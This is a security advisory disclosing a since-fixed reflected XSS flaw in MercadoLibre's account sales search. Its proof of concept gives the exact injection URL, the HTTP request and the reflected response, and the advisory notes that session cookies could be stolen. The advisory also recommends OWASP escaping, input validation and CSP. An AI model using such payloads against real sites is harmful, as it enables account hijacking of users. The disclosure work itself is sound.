Pasar al contenido principal

2018-001: XSS Reflected in Mercadolibre

2018-001: XSS Reflected in Mercadolibre

Original release date: June 8th, 2018
Last revised: June 25th, 2018
Discovered by: Gonzalo Carrasco
Severity: 6.1/10 (CVSSv3 Base Score)

BACKGROUND

MercadoLibre is an Argentine company dedicated to purchases among registered users of its shopping, sales and Internet payments service. It has operations in each country of origin such as Bolivia, Brazil, Chile, Colombia, Costa Rica, Ecuador, Guatemala, Mexico, Nicaragua, Panama, Peru, Paraguay, Salvador, Dominican Republic, Uruguay, Honduras and Venezuela.

Users can sell and / or auction both new and used products at a fixed or variable price private services are also offered.

DESCRIPTION

The application allows injection of JavaScript code reflecting it towards the user, allowing an attacker to simply send a malicious URL to his victim and obtain his session cookies, for example.

VIDEO DEMO

PROOF OF CONCEPT

The vulnerable parameter is "q" and the exploitation is through GET method. The attach works with the parameter "type" set in:

* type=recent
* type=archived

Example:

https://myaccount.mercadolibre.com.ar/sales/list#type=recent&q="><svg/onload=alert(8)>

Request:

GET /sales/cartSearch?type=recent&q="><svg/onload=alert(8)> HTTP/1.1

Host: myaccount.mercadolibre.com.ar

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0

Accept: text/plain, */*; q=0.01

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Referer: https://myaccount.mercadolibre.com.ar/sales/list

X-NewRelic-ID: XQ4OVF5VGwIIUFZQAQUB

X-Requested-With: XMLHttpRequest

Response:

<form data-component="actions-search" class="form-search" onsubmit="return false;">

            <div id="iePlaceHolder" class="ie-place-holder">Comprador o venta</div>

            <input type="text" id="search" name="search" class="txt-search" placeholder="Comprador o venta" value="">

            <svg/onload=alert(8)>

            <input type="button" id="searchBtn" value="Buscar" class="ch-btn-skin ch-btn-small">

</form>

We can see how the server does not filter the special characters correctly, which allows a malicious user to inject arbitrary code. The "svg" tag entered is embedded within the response of the server, allowing the exploitation of this vulnerability

BUSINESS IMPACT

The effects of the discovered vulnerability are raised to a medium-critical level, depending on the interaction that is achieved with the victim user and their status, since if at the time of the attack, the user has an active session with his Mercadolibre account, your current cookies could be captured.

SYSTEMS AFFECTED

MercadoLibre website (vulnerable until June 13th, 2018).

SOLUTION

Preventing XSS requires separation of untrusted data from active browser content:

  • The preferred option is to properly escape all untrusted data based on the HTML context (body, attribute, JavaScript, CSS, or URL) that the data will be placed into. See the OWASP XSS Prevention Cheat Sheet for details on the required data escaping techniques.
  • Positive or whitelist server-side input validation is also recommended as it helps protect against XSS, but is not a complete defense as many applications require special characters in their input. Such validation should, as much as possible, validate the length, characters, format, and business rules on that data before accepting the input.
  • For rich content, consider auto-sanitization libraries like OWASPs AntiSamy or the Java HTML Sanitizer Project.
  • Consider Content Security Policy (CSP) to defend against XSS across your entire site.


Reference: XSS (Cross Site Scripting) Prevention Cheat Sheet
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet

REVISION HISTORY

June 8th, 2018: Initial release

DISCLOSURE TIMELINE

  • June  8th, 2018: Vulnerability acquired by Internet Security Auditors (www.isecauditors.com)
  • June  8th, 2018: Contact with MercadoLibre.
  • June  8th, 2018: Answer from MercadoLibre.
  • June 13th, 2018: Vulnerability corrected by MercadoLibre.
  • June 25th, 2018: Advisory published.

LEGAL NOTICES

The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Internet Security Auditors accepts no responsibility for any damage caused by the use or misuse of this information.

ABOUT

Internet Security Auditors is a Spain and Colombia based company leader in web application testing, network security, penetration testing, security compliance implementation and assessing. Our clients include some of the largest companies in areas such as finance, telecommunications, insurance, ITC, etc. We are vendor independent provider with a deep expertise since 2001. Our efforts in R&D include vulnerability research, open security project collaboration and whitepapers, presentations and security events participation and promotion. For further information regarding our security services, contact us.